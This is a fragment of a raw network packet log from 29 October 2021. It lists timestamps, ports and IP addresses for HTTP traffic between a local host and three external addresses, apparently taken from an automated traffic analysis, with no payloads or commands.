Oct 29, 2021 20:50:19.909595013 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909615040 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909636021 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909657001 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909678936 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909693003 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909701109 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909703016 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909723043 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909723997 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909749985 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909754992 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909771919 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909786940 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909925938 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909949064 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909970045 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909970045 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909993887 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.910017014 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.910037041 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.910041094 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.910084963 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.912291050 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.912318945 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.912338972 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.912358999 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.912379026 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.912379980 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.912403107 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.912411928 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.912422895 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.912432909 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.912446022 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.912467003 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.914757967 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.914788961 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.914808989 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.914829969 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.914851904 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.914869070 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.914874077 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.914895058 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.914906025 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.914917946 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.914928913 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.914937973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.914958000 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.914978981 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.914989948 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915000916 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915019989 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915019989 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915044069 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915065050 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915067911 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915086985 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915112019 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915119886 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915132999 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915152073 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915155888 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915178061 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915199995 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915199995 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915221930 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915281057 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915340900 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915360928 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915380001 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915415049 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915431976 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915446997 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915472031 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915474892 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915482044 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915501118 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915505886 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915546894 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915558100 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915581942 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915591955 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915611029 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915631056 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915632010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915654898 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915673971 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915676117 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915699005 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915719986 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.915740013 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.915770054 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.918103933 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918126106 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918145895 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918167114 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918199062 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.918221951 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.918739080 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918764114 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918786049 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918807030 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918817043 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.918828011 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918848991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918855906 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.918869972 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918891907 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918915033 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.918917894 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918941021 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918945074 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.918961048 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918982029 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.918982983 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.919003010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919023037 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.919023991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919044971 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919065952 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919083118 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.919087887 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919110060 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919111013 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.919131994 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919153929 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919188023 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919204950 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919219971 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919236898 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919256926 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919275999 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.919281006 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919302940 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919311047 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.919331074 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.919563055 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919585943 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919608116 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919616938 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.919627905 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919650078 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919651985 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.919672012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919692039 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919715881 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919737101 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.919739962 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.919780970 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.920449018 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.920468092 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.920489073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.920512915 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.920531988 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.920670986 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.921086073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.921108961 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.921165943 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.921318054 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.921340942 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.921363115 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.921369076 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.921384096 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.921411991 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.921878099 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.921900034 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.921921968 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.921945095 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.921950102 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.921967030 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.921976089 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.921988964 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.922008038 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.922008991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.922029972 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.922050953 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.922060013 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.922075033 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.922091961 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.922096968 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.922118902 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.922139883 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.922158957 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.922158957 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.922188997 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.922218084 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:20.028321028 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:20.030303955 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:20.084808111 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:20.137032032 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:23.150315046 CEST	49857	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.203572989 CEST	80	49857	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:23.203926086 CEST	49857	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.203958035 CEST	49857	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.206789970 CEST	49857	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.257235050 CEST	80	49857	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:23.259850025 CEST	80	49857	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:23.283454895 CEST	80	49857	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:23.284923077 CEST	49857	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.285465002 CEST	49857	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.338762045 CEST	80	49857	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:23.623596907 CEST	49858	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.676583052 CEST	80	49858	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:23.676726103 CEST	49858	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.676845074 CEST	49858	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.676899910 CEST	49858	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.755883932 CEST	80	49858	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:23.759042978 CEST	49858	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.759197950 CEST	49858	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:23.812122107 CEST	80	49858	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:39.531430006 CEST	49864	80	192.168.2.4	172.67.160.46
Oct 29, 2021 20:50:39.548309088 CEST	80	49864	172.67.160.46	192.168.2.4
Oct 29, 2021 20:50:39.548410892 CEST	49864	80	192.168.2.4	172.67.160.46
Oct 29, 2021 20:50:39.549134016 CEST	49864	80	192.168.2.4	172.67.160.46
Oct 29, 2021 20:50:39.566118956 CEST	80	49864	172.67.160.46	192.168.2.4
Oct 29, 2021 20:50:39.733943939 CEST	80	49864	172.67.160.46	192.168.2.4
Oct 29, 2021 20:50:39.733989000 CEST	80	49864	172.67.160.46	192.168.2.4
Oct 29, 2021 20:50:39.734018087 CEST	80	49864	172.67.160.46	192.168.2.4
Oct 29, 2021 20:50:39.734042883 CEST	80	49864	172.67.160.46	192.168.2.4
Oct 29, 2021 20:50:39.734061956 CEST	80	49864	172.67.160.46	192.168.2.4
Oct 29, 2021 20:50:39.734080076 CEST	80	49864	172.67.160.46	192.168.2.4
Oct 29, 2021 20:50:39.734105110 CEST	49864	80	192.168.2.4	172.67.160.46
Oct 29, 2021 20:50:39.734142065 CEST	49864	80	192.168.2.4	172.67.160.46
Oct 29, 2021 20:50:39.773605108 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:39.806760073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:39.810726881 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:39.811393976 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:39.811574936 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:39.856147051 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:39.856173992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.204830885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.204909086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.204946995 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.204987049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.205019951 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.205027103 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.205064058 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.205064058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.205096006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.205117941 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.205286980 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.283876896 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.325810909 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.525811911 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.525849104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.525870085 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.525893927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.525917053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.525938988 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.525962114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.525985003 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.525990009 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.526007891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.526026964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.526101112 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.526159048 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.577557087 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577591896 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577615976 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577641010 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577663898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577687025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577711105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577732086 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.577742100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577764988 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577785969 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.577790022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577811003 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.577815056 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577836990 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.577841043 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577860117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.577877045 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.591993093 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.592027903 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.592050076 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.592071056 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.592092991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.592113972 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.592128038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.592135906 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.592184067 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.611238956 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.611275911 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.611299038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.611315012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.611376047 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.611409903 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.624349117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624385118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624408960 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624424934 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624490023 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.624552965 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.624592066 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624617100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624640942 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624665976 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624670982 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.624689102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624711037 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624711990 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.624732971 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624751091 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.624754906 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624777079 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624792099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.624819994 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.624860048 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.666075945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666109085 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666132927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666151047 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666176081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666201115 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666225910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666239977 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.666241884 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666265965 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666290045 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666316032 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666323900 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.666341066 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666369915 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.666371107 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666395903 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666414976 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.666419983 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666441917 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.666445017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666467905 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.666485071 CEST	80	49865	91.219.236.97	192.168.2.4
